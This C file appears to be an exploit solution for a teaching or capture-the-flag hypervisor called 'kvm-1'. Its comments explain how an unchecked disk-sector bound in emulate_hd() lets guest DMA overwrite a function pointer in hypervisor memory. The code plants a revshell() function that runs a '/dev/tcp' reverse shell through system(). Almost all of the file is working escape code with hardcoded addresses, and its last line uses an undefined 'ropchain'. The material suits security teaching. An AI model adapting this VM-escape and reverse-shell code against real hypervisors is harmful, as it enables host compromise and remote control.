extern void outb(unsigned short a, unsigned char b);
extern void outl(unsigned short a, unsigned int b);

/* kvm-1 is compiled without PIE and runs with ASLR disabled,
 * so we can obtain these addresses from the binary and the debugger.
 */
unsigned long const libc = 0x7ffff79aa000;
unsigned long const system = libc + 0x00000000000503c0;
unsigned long const foo_ptr = 0x0000000001407000;
unsigned long const guestmem = 0x0000000000407000;

typedef int (*system_p)(const char *);
void revshell()
{
	system_p sys = (system_p)system;

	(*sys)("/bin/bash -c 'sh -i >& /dev/tcp/localhost/10000 <&1 &'");
}

/* emulate_hd() doesn't check that hd.mem is less than GUESTMEMSZ.  Since
 * hd.mem is a 32b unsigned value, we can overwrite whatever we want in the
 * 4GiB of the hypervisor memory, starting from &guestmem.  We target the
 * 'foo_ptr' function pointer, which is allocated just after the the guestmem
 * array. Since kvm-1 maps the guestmem array with PROT_EXEC enabled
 * (see the call to mprotect() in kvm.cc), we can simply let 'foo_ptr'
 * point to 'revshell'.
 */

int main()
{
	char buf[512];

	/* to overwrite the hypervisor memory we first store the payload
	 * into any sector of the emulated hard disk, then we load that
	 * sector over the memory that we want to overwrite.
	 */

	/* the payload consists only of the address of the revshell function,
	 * but we still need to write a full sector (512 bytes). 
	 * We should be careful not to ovewrite other data that the hypervisor
	 * may need, or addresses that the hypervisor cannot access.
	 * Since 'foo_ptr' is immediatly after guestmem, we start writing
	 * 512-8 bytes from the end of guestmem. Therefore, we store the
	 * address of revshell at the end of the sector.
	 *
	 * Note that we need the address of revshell in the virtual memory
	 * of the hypervisor: this is just guestmem+revshell.
	 */
	*(unsigned long*)&buf[512-8] = guestmem + (unsigned long)revshell;

	/* DMA-out operation, to store the buffer in sector 0 (any sector will do)
	 */
	outl(0x40, 0);
	outl(0x44, (unsigned long)buf);
	outl(0x48, 2);
	/* now we DMA-in the same sector overflowing guestmem.
	 *
	 * This time we need to subtract 'guestmem' from the hypervisor address
	 * of 'foo_ptr - (512-8)'. The hypervisor will add 'guestmem' back again during
	 * the copy.
	 *
	 * There is no need to select the sector again.
	 */
	outl(0x44, foo_ptr - guestmem - (512-8));
	outl(0x48, 1);

	// now 'foo_ptr' should be overwritten. By writing into I/O port 0x70
	// we will cause the hypervisor to call the foo() function and jump to
	// our code.
	outl(0x70, (unsigned long)ropchain);
}
